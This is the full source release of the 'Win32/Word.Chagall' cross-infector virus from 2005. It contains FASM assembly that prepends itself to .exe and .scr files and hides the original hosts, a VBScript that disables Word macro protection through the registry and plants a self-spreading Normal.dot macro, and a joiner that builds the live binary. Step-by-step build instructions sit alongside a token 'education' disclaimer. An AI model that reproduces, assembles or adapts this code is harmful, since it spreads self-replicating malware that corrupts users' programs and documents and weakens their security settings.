;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;     Win32/Word.Chagall   -     by DiA/rrlf     ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;     ======================================     ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;                                                ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;     DiA_hates_machine@gmx.de                   ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;     http://www.vx-dia.de.vu                    ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;                                  22.05.2k5     ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

Disclaimer:
	Attention! With this source code files you can make a living and working virus!
	I am NOT responsible for any damage you make with this bug! DO NEVER spread
	viruses or worms! It will bring trouble! This is just for education. TAKE CARE!

Intro:
	Welcome to my first cross infector. This bug will infect executables at win32
	environment and microsoft word documents. It took me a long time to finish this
	because i had no fun coding that vba/vbs stuff :D. But finally it's finished
	and i hope you have much fun with it.

Description:
	Most cross infectors for PE/DOC i saw was nearly same thing, the word infection
	part was inside the exe in the data section. But i want (as always) make
	somethin new. So i decided to make two parts of the virus and then join it
	together. It works good, but need for a really good virus some more features,
	like encrypt the host file, encrypt the word part, just in one word encrypt the
	whole virus. Maybe later... Ok, now i will tell you from two situations how
	Chagall worx, one time from a .exe started, and other time from a .doc .

Win32 Part:
	From a .exe or .scr started the virus will make following, step by step:
		- read Win32 part into memory
		- read Host file into memory
		- read Word part into memory
		- write host from memory to disk under name of infected file .sys
		- set attribute hidden to this .sys file
		- execute the host
		- infect files in current folder, windows folder and system folder
		- infect .exe and .scr files
		- keep file attributes and file time
		- infected file will look like this:
			####################
			# Virus Win32 part #
			####################
			####################
			# Host file        #
			####################
			####################
			# Virus Word part  #
			####################
		- check if word is running, if so dont infect Normal.dot because user
		  will notice that somethin happends to Word
		- drop the Word part from memory to disk in the windows folder
		- make a copy of the virus in windows folder, Win32 part + Word part
		- execute the .vbs file, that will insert the Word part code into
		  Normal.dot
		- delete this .vbs file
		- check for payload date, if it is 30.06. show a simple message box
		- exit virus

Word Part:
	Let's say the virus comes from a .doc file into not infected system:
		- execute code when a document get's closed
		- read virus, Win32 part + Word part, from a variable inside the doc
		- write the virus to drive C:\ as Chag32.exe
		- execute this file, it will infect all .exe and .scr files, and then
		  infect also the Nomal.dot
		- that makes the Word part not a typical macro virus, active infect
		  normal, normal infect active
		- it is like a circle, active drop Win32 part, Win32 part infect normal
		  and normal infect other active documents
		- nothin really great this Word part, no stealth, no encryption...
		  just that it work, maybe someone want to make an advanced macro part?
		- please see Word part for more informations ;P

Make a working Chagall:
	Hehe, because there are two parts it's not just like assemble and run kiddies
	:P. Save all in one folder, Chagall.asm, Chagall.vbs, size.equ and Joiner.asm .
	Then assemble Chagall.asm with FASM (www.flatassembler.org) and assemble
	Joiner.asm too. Now you have Chagall.exe, Chagall.vbs and Joiner.exe in one
	folder. run Joiner.exe and output should be ReadyChagall.exe. Attention, this
	is the working virus. Take care.

Outro:
	I am proud to finish this bug, I hope you enjoy the code! Greets fly's out to
	all my real and cyber friends, to you the reader and to my mom, the name
	Chagall was her idea, it was some artist (like my mom) who makes gnaaarly
	pictures. For greets or fucks feel free to drop me a mail or make a guestbook
	entry at my page. Have a great day, and we see us in my next creation...

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;     Win32/Word.Chagall   -     by DiA/rrlf     ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;     ======================================     ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;                                                ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;     DiA_hates_machine@gmx.de                   ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;     http://www.vx-dia.de.vu                    ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;                                  22.05.2k5     ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;



;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;     Chagall EXE Part     -     Chagall.asm     ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

include "%fasminc%\win32ax.inc"
include "size.inc"

Chagall:
	call LoadInMem

	call ExecuteHost

	invoke GetCurrentDirectory,\
	       256d,\
	       CurrentDir

	mov ebx, CurrentDir
	call MakePathValid

	mov ebx, CurrentDir
	mov ecx, 10d
	mov edx, ExeFiles
	call InfectFiles

	mov ebx, CurrentDir
	mov ecx, 10d
	mov edx, ScrFiles
	call InfectFiles

	invoke GetWindowsDirectory,\
	       WindowsDir,\
	       256d

	mov ebx, WindowsDir
	call MakePathValid

	mov ebx, WindowsDir
	mov ecx, 15d
	mov edx, ExeFiles
	call InfectFiles

	mov ebx, WindowsDir
	mov ecx, 15d
	mov edx, ScrFiles
	call InfectFiles

	invoke GetSystemDirectory,\
	       SystemDir,\
	       256d

	mov ebx, SystemDir
	call MakePathValid

	mov ebx, SystemDir
	mov ecx, 20d
	mov edx, ExeFiles
	call InfectFiles

	mov ebx, SystemDir
	mov ecx, 20d
	mov edx, ScrFiles
	call InfectFiles

	call IsWordRunning

	cmp ecx, SomethinFalse
	je Exit

	call DropWordInfector

Exit:
	call LoadOutMem

	call Payload

	invoke ExitProcess,\
	       0

;*****LoadInMem*****Procedure***************************
LoadInMem:						;load virus (PE/DOC) and host in memory
	invoke GetModuleFileName,\
	       0,\
	       HostFileName,\
	       256d

	mov edx, OPEN_EXISTING
	mov ecx, GENERIC_READ
	mov ebx, HostFileName
	call OpenFile
	mov dword [HostFileHandle], eax

	cmp ecx, SomethinFalse
	je LoadInMemError

	mov edx, VirusMemHandle
	mov ebx, VirusMemStart
	mov ecx, VirusSize
	call GetMem

	cmp ecx, SomethinFalse
	je LoadInMemError

	mov ebx, HostFileHandle
	mov ecx, VirusMemStart
	mov edx, VirusSize
	call ReadInMem

	cmp ecx, SomethinFalse
	je LoadInMemError

	invoke GetFileSize,\
	       dword [HostFileHandle],\
	       0

	sub eax, VirusSize
	sub eax, WordDropSize

	cmp eax, 0
	je ReadWordDropper

	mov dword [HostFileSize], eax

	mov edx, HostMemHandle
	mov ebx, HostMemStart
	mov ecx, dword [HostFileSize]
	call GetMem

	cmp ecx, SomethinFalse
	je LoadInMemError

	mov ebx, HostFileHandle
	mov ecx, HostMemStart
	mov edx, dword [HostFileSize]
	call ReadInMem

	cmp ecx, SomethinFalse
	je LoadInMemError

ReadWordDropper:
	mov edx, WordMemHandle
	mov ebx, WordMemStart
	mov ecx, WordDropSize
	call GetMem

	cmp ecx, SomethinFalse
	je LoadInMemError

	mov ebx, HostFileHandle
	mov ecx, WordMemStart
	mov edx, WordDropSize
	call ReadInMem

	cmp ecx, SomethinFalse
	je LoadInMemError

	mov ebx, HostFileHandle
	call CloseHand

LoadInMemError:
	mov ecx, SomethinFalse
	jmp LoadInMemReturn

LoadInMemEnd:
	mov ecx, 0

LoadInMemReturn:
ret
;*****LoadInMem*****Procedure***end*********************

;*****OpenFile*****Procedure****************************
OpenFile:
	invoke CreateFile,\
	       ebx,\					;edx - flags (CREATE_ALWAYS...OPEN_EXISTING)
	       ecx,\					;ebx - filename to open
	       FILE_SHARE_READ + FILE_SHARE_WRITE,\	;ecx - GENERIC_READ .. GENERIC_WRITE
	       0,\
	       edx,\					;open or create?
	       FILE_ATTRIBUTE_NORMAL,\
	       0

	cmp eax, INVALID_HANDLE_VALUE
	jne OpenFileEnd

	mov ecx, SomethinFalse
	jmp OpenFileReturn

OpenFileEnd:
	mov ecx, 0

OpenFileReturn:
ret
;*****OpenFile*****Procedure***end**********************

;*****GetMem*******Procedure****************************
GetMem:
	invoke GlobalAlloc,\				;edx - pointer to handle
	       GMEM_MOVEABLE,\				;ebx - pointer to start address
	       ecx					;ecx - size of memory to get
	mov dword [edx], eax

	cmp eax, 0
	je GetInMemError

	invoke GlobalLock,\
	       dword [edx],
	mov dword [ebx], eax

	cmp eax, 0
	jne GetInMemEnd

GetInMemError:
	mov ecx, SomethinFalse
	jmp GetInMemReturn

GetInMemEnd:
	mov ecx, 0

GetInMemReturn:
ret
;*****GetMem++*****Procedure***end**********************

;*****ReadInMem*****Procedure***************************
ReadInMem:
	invoke ReadFile,\				;ebx - pointer to file handle
	       dword [ebx],\				;ecx - pointer to start address
	       dword [ecx],\				;edx - size to read
	       edx,\
	       BytesRead,\
	       0

	cmp eax, 0
	jne ReadInMemEnd

	mov ecx, SomethinFalse
	jmp ReadInMemReturn

ReadInMemEnd:
	mov ecx, 0

ReadInMemReturn:
ret
;*****ReadInMem*****Procedure***************************

;*****CloseHand*****Procedure***************************
CloseHand:
	invoke CloseHandle,\				;ebx - handle to close
	       dword [ebx]
ret
;*****CloseHand*****Procedure***end*********************

;*****ExecuteHost*****Procedure*************************
ExecuteHost:
	mov ebx, HostFileName
	call GetEndOfString

	mov dword [ebx - 3d], "sys"

	invoke SetFileAttributes,\
	       HostFileName,\
	       FILE_ATTRIBUTE_NORMAL

	mov edx, CREATE_ALWAYS
	mov ecx, GENERIC_WRITE
	mov ebx, HostFileName
	call OpenFile
	mov dword [HostFileHandle], eax

	cmp ecx, SomethinFalse
	je ExecuteHostError

	mov ebx, HostFileHandle
	mov edx, HostMemStart
	mov ecx, dword [HostFileSize]
	call WriteToFile

	cmp ecx, SomethinFalse
	je ExecuteHostError

	mov ebx, HostFileHandle
	call CloseHand

	invoke SetFileAttributes,\
	       HostFileName,\
	       FILE_ATTRIBUTE_HIDDEN

	invoke GetCommandLine

	mov ebx, HostFileName
	mov edx, eax
	call ExecuteThis

	cmp ecx, SomethinFalse
	jne ExecuteHostEnd

ExecuteHostError:
	mov ecx, SomethinFalse
	jmp ExecuteHostReturn

ExecuteHostEnd:
	mov ecx, 0

ExecuteHostReturn:
ret
;*****ExecuteHost*****Procedure***end*******************

;*****WriteToFile*****Procedure*************************
WriteToFile:
	invoke WriteFile,\
	       dword [ebx],\				;ebx - file handle
	       dword [edx],\				;edx - start address of buffer
	       ecx,\					;ecx - size to write
	       BytesWrite,\
	       0

	cmp eax, 0
	jne WriteToFileEnd

	mov ecx, SomethinFalse
	jmp WriteToFileReturn

WriteToFileEnd:
	mov ecx, 0

WriteToFileReturn:
ret
;*****WriteToFile*****Procedure***end*******************

;*****ExecuteThis*****Procedure*************************
ExecuteThis:
	invoke CreateProcess,\
	       ebx,\					;ebx - pointer to file to execute
	       edx,\					;edx - pointer to commandline
	       0,\
	       0,\
	       0,\
	       CREATE_NEW_CONSOLE,\
	       0,\
	       0,\
	       Startup,\
	       Process

	cmp eax, 0
	jne ExecuteThisEnd

	mov ecx, SomethinFalse
	jmp ExecuteThisReturn

ExecuteThisEnd:
	mov ecx, 0

ExecuteThisReturn:
ret
;*****ExecuteThis*****Procedure***end*******************

;*****InfectFiles*****Procedure*************************
InfectFiles:
	mov dword [InfectCount], ecx
	push edx

	invoke SetCurrentDirectory,\
	       ebx					;ebx - directory to infect
							;ecx - infection counter
	cmp eax, 0					;edx - pointer to victim string
	je InfectFilesError

	pop edx

	invoke FindFirstFile,\
	       edx,\
	       Win32FindData
	mov dword [FindHandle], eax

FindMoreFiles:
	cmp eax, 0
	je NoMoreFiles

	cmp dword [InfectCount], 0
	je NoMoreFiles

	invoke GetFileAttributes,\
	       Win32FindData.cFileName
	mov dword [VictimAttributes], eax

	invoke SetFileAttributes,\
	       Win32FindData.cFileName,\
	       FILE_ATTRIBUTE_NORMAL

	mov edx, OPEN_EXISTING
	mov ecx, GENERIC_READ + GENERIC_WRITE
	mov ebx, Win32FindData.cFileName
	call OpenFile
	mov dword [VictimHandle], eax

	cmp ecx, SomethinFalse
	je FindNextVictim

	invoke GetFileTime,\
	       dword [VictimHandle],\
	       Filetime,\
	       Filetime,\
	       Filetime

	invoke GetFileSize,\
	       dword [VictimHandle],\
	       0
	mov dword [VictimSize], eax

	mov edx, VictimMemHandle
	mov ebx, VictimMemStart
	mov ecx, dword [VictimSize]
	call GetMem

	cmp ecx, SomethinFalse
	je FindNextVictim

	mov ebx, VictimHandle
	mov ecx, VictimMemStart
	mov edx, dword [VictimSize]
	call ReadInMem

	cmp ecx, SomethinFalse
	je FindNextVictim

	mov ebx, dword [VictimMemStart]
	mov ecx, dword [VictimSize]

GetInfectionMark:
	cmp dword [ebx], "CHAG"
	je FindNextVictim

	dec ecx
	cmp ecx, 0
	je InfectThisFile

	inc ebx
	jmp GetInfectionMark

InfectThisFile:
	invoke SetFilePointer,\
	       dword [VictimHandle],\
	       0,\
	       0,\
	       FILE_BEGIN

	mov ebx, VictimHandle
	mov edx, VirusMemStart
	mov ecx, VirusSize
	call WriteToFile

	cmp ecx, SomethinFalse
	je FindNextVictim

	mov ebx, VictimHandle
	mov edx, VictimMemStart
	mov ecx, dword [VictimSize]
	call WriteToFile

	cmp ecx, SomethinFalse
	je FindNextVictim

	mov ebx, VictimHandle
	mov edx, WordMemStart
	mov ecx, WordDropSize
	call WriteToFile

FindNextVictim:
	invoke SetFileTime,\
	       dword [VictimHandle],\
	       Filetime,\
	       Filetime,\
	       Filetime

	mov ebx, VictimHandle
	call CloseHand

	invoke SetFileAttributes,\
	       Win32FindData.cFileName,\
	       dword [VictimAttributes]

	dec dword [InfectCount]

	invoke FindNextFile,\
	       dword [FindHandle],\
	       Win32FindData
	jmp FindMoreFiles

NoMoreFiles:
	mov ebx, FindHandle
	call CloseHand

	mov ecx, 0
	jmp InfectFilesReturn

InfectFilesError:
	mov ecx, SomethinFalse

InfectFilesReturn:
ret
;*****InfectFiles*****Procedure***end*******************

;*****FreeMem*****Procedure*****************************
FreeMem:
	invoke GlobalUnlock,\				;ebx - handle to mem to free
	       dword [ebx]

	invoke GlobalFree,\
	       dword [ebx]

FreeMemEnd:
ret
;*****FreeMem*****Procedure***end***********************

;*****LoadOutMem*****Procedure**************************
LoadOutMem:
	mov ebx, VirusMemHandle
	call FreeMem

	mov ebx, HostMemHandle
	call FreeMem

	mov ebx, WordMemHandle
	call FreeMem

	mov ebx, VictimMemHandle
	call FreeMem
ret
;*****LoadOutMem*****Procedure***end*********************

;*****IsWordRunning*****Procedure************************
IsWordRunning:
	invoke Sleep,\
	       20000					;sleep 20 seconds, maybe word gets now closed

	invoke CreateToolhelp32Snapshot,\		;check if word is running
	       2,\					;if so dont infect normal.dot
	       0					;because its in use

	mov dword [SnapHandle], eax
	mov dword [ProcessEntry], sizeof.PROCESSENTRY32

	invoke Process32First,\
	       dword [SnapHandle],\
	       ProcessEntry

FindNextProcess:
	cmp eax, 0
	je NoWordIsRunning

	mov ebx, ProcessEntry.szExeFile
	call GetEndOfString

	cmp dword [ebx - 11d], "WINW"
	jne FindNextP

	cmp dword [ebx - 7d], "ORD."
	je WordIsRunning

FindNextP:
	invoke Process32Next,\
	       dword [SnapHandle],\
	       ProcessEntry

	jmp FindNextProcess

WordIsRunning:
	mov ecx, SomethinFalse
	jmp IsWordRunningReturn

NoWordIsRunning:
	xor ecx, ecx

IsWordRunningReturn:
ret
;*****IsWordRunning*****Procedure***end******************

;*****DropWordInfector*****Procedure*********************
DropWordInfector:
	invoke GetWindowsDirectory,\
	       WindowsDirectory,\
	       256d

	mov ebx, WindowsDirectory
	call MakePathValid

	invoke SetCurrentDirectory,\
	       WindowsDirectory

	cmp eax, 0
	je DropWordInfectorError

	mov edx, CREATE_ALWAYS
	mov ecx, GENERIC_WRITE
	mov ebx, WordDropName
	call OpenFile
	mov dword [WordDropHandle], eax

	cmp ecx, SomethinFalse
	je DropWordInfectorError

	mov ebx, WordDropHandle
	mov edx, WordMemStart
	mov ecx, WordDropSize
	call WriteToFile

	cmp ecx, SomethinFalse
	je DropWordInfectorError

	mov ebx, WordDropHandle
	call CloseHand

	mov edx, CREATE_ALWAYS
	mov ecx, GENERIC_WRITE
	mov ebx, WordDropExe
	call OpenFile
	mov dword [WordExeHandle], eax

	mov ebx, WordExeHandle
	mov edx, VirusMemStart
	mov ecx, VirusSize
	call WriteToFile

	mov ebx, WordExeHandle
	mov edx, WordMemStart
	mov ecx, WordDropSize
	call WriteToFile

	mov ebx, WordExeHandle
	call CloseHand

	invoke ShellExecute,\
	       0,\
	       WordDropExecute,\
	       WordDropName,\
	       0,\
	       0,\
	       SW_HIDE

	cmp eax, 32
	jbe DropWordInfectorError

	invoke Sleep,\
	       10000

	invoke DeleteFile,\
	       WordDropName

	mov ecx, 0
	jmp DropWordInfectorReturn

DropWordInfectorError:
	mov ecx, SomethinFalse

DropWordInfectorReturn:
ret
;*****DropWordInfector*****Procedure***end***************

;*****MakePathValid*****Procedure************************
MakePathValid:
	cmp byte [ebx], 0				;ebx - pointer to path string
	je CheckValidness

	inc ebx
	jmp MakePathValid

CheckValidness:
	cmp byte [ebx - 1], "\"
	je PathIsValid

	mov byte [ebx], "\"
	mov byte [ebx + 1], 0

PathIsValid:
ret
;*****MakePathValid*****Procedure***end******************

;*****GetEndOfString*****Procedure***********************
GetEndOfString: 					;ebx - pointer to string
	cmp byte [ebx], 0
	je HaveEndOfString

	inc ebx
	jmp GetEndOfString

HaveEndOfString:
ret
;*****GetEndOfString*****Procedure***end*****************

;*****Payload*****Procedure******************************
Payload:
	invoke GetSystemTime,\
	       SystemTime

	cmp word [SystemTime.wMonth], 06d
	jne PayloadReturn

	cmp word [SystemTime.wDay], 30d
	jne PayloadReturn

	invoke MessageBox,\
	       0,\
	       PayloadCaption,\
	       PayloadText,\
	       MB_ICONWARNING

PayloadReturn:
ret
;*****Payload*****Procedure***end************************



Datas:
	HostFileName		rb 256d
	HostFileHandle		dd ?
	VirusMemHandle		dd ?
	VirusMemStart		dd ?
	BytesRead		dd ?
	BytesWrite		dd ?
	HostFileSize		dd ?
	HostMemHandle		dd ?
	HostMemStart		dd ?
	WordMemHandle		dd ?
	WordMemStart		dd ?
	FindHandle		dd ?
	VictimHandle		dd ?
	VictimSize		dd ?
	VictimMemHandle 	dd ?
	VictimMemStart		dd ?
	CurrentDir		rb 256d
	ExeFiles		db "*.exe",0
	ScrFiles		db "*.scr",0
	InfectCount		dd ?
	VictimAttributes	dd ?
	WindowsDirectory	rb 256d
	WordDropName		db "chagall.vbs",0
	WordDropHandle		dd ?
	WordDropExecute 	db "open",0
	WordDropExe		db "chag.wrd",0
	WordExeHandle		dd ?
	SnapHandle		dd ?
	WindowsDir		rb 256d
	SystemDir		rb 256d
	PayloadCaption		db "Win32/Word.Chagall Virus by DiA/rrlf",0
	PayloadText		db "Bad news for you: you are infected with a virus",10,13
				db "Good news for me: its my birthday ;)",10,13
				db "So be happy with me at this day, turn of the computer and open a beer...",10,13,10,13
				db "Thanks, DiA/Ready Rangers Liberation Front",0

struct PROCESSENTRY32
	.dwSize 		dd ?
	.cntUsage		dd ?
	.th32ProcessID		dd ?
	.th32DefaultHeapID	dd ?
	.th32ModuleID		dd ?
	.cntThreads		dd ?
	.th32ParentProcessID	dd ?
	.pcPriClassBase 	dd ?
	.dwFlags		dd ?
	.szExeFile		rb 260d
ends

	Startup 	STARTUPINFO
	Process 	PROCESS_INFORMATION
	Win32FindData	FINDDATA
	Filetime	FILETIME
	ProcessEntry	PROCESSENTRY32
	SystemTime	SYSTEMTIME

data import
	library kernel32,		"KERNEL32.DLL",\
		user32, 		"USER32.DLL",\
		shell32,		"SHELL32.DLL"

	import kernel32,\
	       GetModuleFileName,	"GetModuleFileNameA",\
	       CreateFile,		"CreateFileA",\
	       GlobalAlloc,		"GlobalAlloc",\
	       GlobalLock,		"GlobalLock",\
	       ReadFile,		"ReadFile",\
	       GetFileSize,		"GetFileSize",\
	       CloseHandle,		"CloseHandle",\
	       WriteFile,		"WriteFile",\
	       CreateProcess,		"CreateProcessA",\
	       GetCommandLine,		"GetCommandLineA",\
	       GetCurrentDirectory,	"GetCurrentDirectoryA",\
	       SetCurrentDirectory,	"SetCurrentDirectoryA",\
	       FindFirstFile,		"FindFirstFileA",\
	       FindNextFile,		"FindNextFileA",\
	       SetFilePointer,		"SetFilePointer",\
	       GlobalUnlock,		"GlobalUnlock",\
	       GlobalFree,		"GlobalFree",\
	       GetFileAttributes,	"GetFileAttributesA",\
	       SetFileAttributes,	"SetFileAttributesA",\
	       GetFileTime,		"GetFileTime",\
	       SetFileTime,		"SetFileTime",\
	       GetWindowsDirectory,	"GetWindowsDirectoryA",\
	       GetSystemDirectory,	"GetSystemDirectoryA",\
	       DeleteFile,		"DeleteFileA",\
	       Sleep,			"Sleep",\
	       CopyFile,		"CopyFileA",\
	       CreateToolhelp32Snapshot,"CreateToolhelp32Snapshot",\
	       Process32First,		"Process32First",\
	       Process32Next,		"Process32Next",\
	       GetSystemTime,		"GetSystemTime",\
	       ExitProcess,		"ExitProcess"

	import user32,\
	       MessageBox,		"MessageBoxA"

	import shell32,\
	       ShellExecute,		"ShellExecuteA"
end data

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;     Chagall EXE Part     -     Chagall.asm     ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;



;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;     Chagall VBS Part     -     Chagall.vbs     ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

On Error Resume Next
Set Word = WScript.CreateObject("Word.Application")
Set Shell = CreateObject("WScript.Shell")
Set N = Word.NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule
Word.Options.VirusProtection = False
Word.Options.ConfirmConversion = False
Word.Options.SaveNormalPrompt = False
RegPath = "HKCU\Software\Microsoft\Office\" & Word.Application.Version & "\Word\Security\"
Shell.RegWrite RegPath & "Level", 1, "REG_DWORD"
Shell.RegWrite RegPath & "AccessVBOM", 1, "REG_DWORD"
N.DeleteLines 1, N.CountOfLines
N.InsertLines 1, "Private Sub Document_Close()"
N.InsertLines 2, "On Error Resume Next"
N.InsertLines 3, "Options.VirusProtection = False"
N.InsertLines 4, "Options.SaveNormalPrompt = False"
N.InsertLines 5, "Options.ConfirmConversions = False"
N.InsertLines 6, "Set VirCode = NormalTemplate.VBProject.VBComponents(1).CodeModule"
N.InsertLines 7, "Set ActiveD = ActiveDocument.VBProject.VBComponents(1)"
N.InsertLines 8, "Set ActCode = ActiveD.CodeModule"
N.InsertLines 9, "If ActiveD.Name = ""Chagall"" Then"
N.InsertLines 10, "GoTo DropExe"
N.InsertLines 11, "Else"
N.InsertLines 12, "ActCode.DeleteLines 1, ActCode.CountOfLines"
N.InsertLines 13, "ActCode.InsertLines 1, VirCode.Lines(1, VirCode.CountOfLines)"
N.InsertLines 14, "ActiveD.Name = ""Chagall"""
N.InsertLines 15, "End If"
N.InsertLines 16, "DropExe:"
N.InsertLines 17, "Dim AExeFile As String"
N.InsertLines 18, "Dim NExeFile As String"
N.InsertLines 19, "AExeFile = ActiveDocument.Variables(""llagahc"").Value"
N.InsertLines 20, "NExeFile = Normal.ThisDocument.Variables(""llagahc"").Value"
N.InsertLines 21, "If NExeFile = """" Then"
N.InsertLines 22, "Open Environ(""WinDir"") & ""\Chag.wrd"" For Binary As #1"
N.InsertLines 23, "NExeFile = Space(LOF(1))"
N.InsertLines 24, "Get #1, , NExeFile"
N.InsertLines 25, "Close #1"
N.InsertLines 26, "Normal.ThisDocument.Variables.Add ""llagahc"", NExeFile"
N.InsertLines 27, "End If"
N.InsertLines 28, "If AExeFile = """" Then"
N.InsertLines 29, "ActiveDocument.Variables.Add ""llagahc"", NExeFile"
N.InsertLines 30, "End If"
N.InsertLines 31, "Open Left(Environ(""WinDir""), 3) & ""Chag32.exe"" For Binary As #1"
N.InsertLines 32, "Put #1, , NExeFile"
N.InsertLines 33, "Close #1"
N.InsertLines 34, "Shell Left(Environ(""WinDir""), 3) & ""Chag32.exe"""
N.InsertLines 35, "If Left(ActiveDocument.Name, 2) = ""Do"" And IsNumeric(Right(ActiveDocument.Name, 1)) = True Then"
N.InsertLines 36, "ActiveDocument.Saved = True"
N.InsertLines 37, "Else"
N.InsertLines 38, "ActiveDocument.SaveAs ActiveDocument.FullName"
N.InsertLines 39, "End If"
N.InsertLines 40, "End Sub"
Word.Quit

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;     Chagall VBS Part     -     Chagall.vbs     ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;



;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;     Chagall EQU Part     -     size.equ        ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

VirusSize	equ 2205d ;packed with fsg!
WordDropSize	equ 2671d
SomethinFalse	equ 1313d

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;     Chagall EQU Part     -     size.equ        ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;



;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;     Chagall Parts Joiner -     Joiner.asm      ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

include "%fasminc%\win32ax.inc"
include "size.inc"

.data
	Win32PartName		db "Chagall.exe",0
	Win32PartHandle 	dd ?
	Win32PartBuffer 	rb VirusSize
	WordPartName		db "Chagall.vbs", 0
	WordPartHandle		dd ?
	WordPartBuffer		rb WordDropSize
	OutputFileName		db "ReadyChagall.exe",0
	OutputFileHandle	dd ?
	BytesRead		dd ?
	BytesWrite		dd ?
.code
Joiner:
;*****read win32 and word part into buffer************
	mov ebx, Win32PartName
	mov ecx, GENERIC_READ
	mov edx, OPEN_EXISTING
	call OpenFile_
	mov dword [Win32PartHandle], eax

	cmp ecx, SomethinFalse
	je CantReadWin32Part

	mov ebx, Win32PartHandle
	mov ecx, Win32PartBuffer
	mov edx, VirusSize
	call ReadInBuffer

	cmp ecx, SomethinFalse
	je CantReadWin32Part

	invoke CloseHandle,\
	       dword [Win32PartHandle]

	mov ebx, WordPartName
	mov ecx, GENERIC_READ
	mov edx, OPEN_EXISTING
	call OpenFile_
	mov dword [WordPartHandle], eax

	cmp ecx, SomethinFalse
	je CantReadWordPart

	mov ebx, WordPartHandle
	mov ecx, WordPartBuffer
	mov edx, WordDropSize
	call ReadInBuffer

	cmp ecx, SomethinFalse
	je CantReadWordPart

	invoke CloseHandle,\
	       dword [WordPartHandle]
;*****read win32, firstgen and word part into buffer***end******

;*****write win32, firstgen and word part to file***************
	mov ebx, OutputFileName
	mov ecx, GENERIC_WRITE
	mov edx, CREATE_ALWAYS
	call OpenFile_
	mov dword [OutputFileHandle], eax

	cmp ecx, SomethinFalse
	je CantCreateOutputFile

	mov ebx, OutputFileHandle
	mov edx, Win32PartBuffer
	mov ecx, VirusSize
	call WriteToFile

	cmp ecx, SomethinFalse
	je CantWriteWin32Part

	mov ebx, OutputFileHandle
	mov edx, WordPartBuffer
	mov ecx, WordDropSize
	call WriteToFile

	cmp ecx, SomethinFalse
	je CantWriteWordPart

	invoke CloseHandle,\
	       dword [OutputFileHandle]

	invoke MessageBox,\
	       0,\
	       "OutputFile successfully written. Take care, now it is a living VIRUS!",\
	       "success - Win32/Word.Chagall is now working",\
	       MB_ICONINFORMATION
